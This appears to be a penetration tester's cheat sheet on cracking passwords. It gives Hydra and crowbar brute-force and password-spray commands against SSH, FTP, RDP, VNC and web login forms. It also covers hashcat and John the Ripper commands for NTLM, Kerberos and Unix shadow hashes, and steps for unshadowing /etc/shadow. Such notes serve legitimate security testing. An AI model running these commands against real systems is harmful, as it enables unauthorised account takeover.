Cracking service logins and password hashes.
Cracking the Hashes
Name That Hash to identify a hash type.
John the Ripper Cheatsheet
SkullSecurity Wiki Page
Passwords, login pages, etc.
Ciphey
CyberChef
Seclists
Have I Been Pwned Passwords
Rainbow Crack, Rainbow Tables
Rocktastic Mega Wordlist
berzerk0 wordlist
Weakpass
Make your own wordlist: Crunch Cewl
Kaonashi Wordlist
Mega wordlist
Check Web Enumeration checklist for default CMS creds
https://cirt.net/passwords
https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials
Brute Force Login Pages with Hydra
Brute Forcing Services with Hydra
ftp, ssh, rdp, http-post, http-get
hydra -l ftp -P passlist.txt ftp://10.10.x.x
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v
hydra -e nsr -l username -P wordlist 10.10.10.10 service -s [port if not default]
-e nsr: tries no pass, same pass as usernames, passwords as backwords username
hydra -C creds_list 10.10.10.10 vnc #use creds list in format user:password
Password Spray a List of IPs (1 on each line IP:port if needed)
hydra -M servers.list -C creds.txt ssh
http-get
hydra -L user.txt -P wordlist.txt 10.10.10.10 http-get /directory_path
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
http-post
intercept request in burp - see body. No response - :S=302
hydra 10.10.10.10 http-form-post "/index.php:user=admin&pass=^PASS^:INVALID LOGIN MSG" -l admin -P /usr/share/wordlists/rockyou.txt -vV -f
Brute forcing web login pages with intruder
Look for change in status code or change in length of header
crowbar -b rdp -s 10.10.10.10 -u admin -C rockyou.txt -n 1
wpscan: crack wordpress logins
pwn Jenkins: crack Jenkins service
Identify Hash Type
Name That Hash
Search that Hash: search online sites then try with hashcat
hash-identifier [hash]
Online Hash Databases
Crackstation: try first esp. with Windows hashes
MD5Decrypt: look up MD5 hashes
Hash Toolkit: MD5, SHA1, SHA256, SHA512 hashes
Cmd5: MD5, SHA1, MySQl and SHA256 hashes
Online Hash Crack: Hashes, WPA2 captures, PDF, zips
Note: Google Collab now does not allow instances to be used for password cracking, and will detect and block the use of password cracking software (blocks hashcat install).
Large wordlist - use google colab projects: colabsth, or penglab - Hashcat, John, Hydra
Google Collab alternatives:
vast.ai, setup
hashcat -m [mode] hashes wordlist
Quick Reference:
potfile: hashcat.potfile, usually in ~/.hashcat/ on Kali.
hashcat -m 1000 hashes.ntds --show --user #see cracked hashes and usernames
-a 0 #attack mode 0 for a wordlist attack should be good to crack most passwords
-m 1000 #NT (most Windows passwords)
-m 3000 #LANMAN (legacy Windows password hashes, very weak)
-m 5500 #NTLMv1 (hashes captured from using a tool like Responder)
-m 5600 #NTLMv2 (hashes captured from using a tool like Responder)
-m 1600 #MD5
-m 500 #MD5 /etc/shadow and /etc/passwd combined
-a 0 -r hashcat/rules/best64.rule # use standard rule file with a wordlist attack
hashcat -b -m #type
hashcat -m #type --example-hashes
hashcat -a 0 -m #type hash.txt dict.txt
dive.rule, best64.rule
One rule to rule them all
hashcat -a 0 -m #type hash.txt wordlist.txt -r rule.txt
hashcat -m 1000 -a 0 hash.txt wordlist.txt -r best64.rule #standard rule file used
hashcat -a 1 -m #type hash.txt wordlist1.txt wordlist2.txt
Windows minimum standard password complexity policy is often:
At least 8 characters in length
At least one uppercase letter
At least one lowercase letter
At least one digit
Markers to specifiy type of character:
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
hashcat -m 1000 -a 3 hashes.ntds ?u?l?l?l?l?l?l?d #minimum Windows password policy
hashcat -a 6 -m #type hash.txt wordlist.txt ?a?a?a?a
hashcat -a 7 -m #type hash.txt ?a?a?a?a wordlist.txt
Default Increment
hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
Increment Minimum Length
hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
Increment Max Lenth
hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
Session Restore
hashcat -a 0 -m #type --restore --session <uniq_name> hash.txt wordlist.txt
username:x or ! or password (older Unix):GECOS (for compatibility):hashtype: salt:hash #format in /etc/shadow
Hashtypes:
$ : DES $1 : MD5 $2 : Blowfish $5 : SHA-256 $6 : SHA-512
hashcat -m 13100 --force <TGSs_file> <passwords_file>
hashcat -a 0 -m 18200 <asrep_file> <password_file>
John the Ripper Cheatsheet
John is easier to user then hashcat - but slower and not as flexible. It will crack hashes of the first algorithim / hashtype seen in a file. Stores cracked passwords in ~/.john/john.pot by default.
Install newest version:
git clone https://github.com/openwall/john -b bleeding-jumbo /data/tools/john ; cd /data/tools/john/src/ ; ./configure && make -s clean && make -sj4 ; cd ~
Use rules:
john combined --format=md5crypt --wordlist=wordlist.txt --rules=Jumbo
--rules=KoreLogic
--rules=All
Supply the text output from Impacket secretsdump.py, Mimikatz, Meterpreter as the file to crack hashes from.
john --format=nt hash.txt #specify NT (default is LANMAN)
--format=netntlm #with Responder
--format=netntlmv2 #with Responder
Copy /etc/passwd and /etc/shadow to local workstation, unshadow passwd shadow, crack hashes.
sudo unshadow /etc/passwd /etc/shadow > combined
john combined
SHA512 hashes
john --wordlist=rockyou.txt --format=sha512crypt hashes
MD5 Hashes
john --format=NT --wordlist=rockyou.txt hashes
john --wordlist=/usr/share/wordlists/rockyou.txt /tmp/sqlmap*/sqlmap* --rules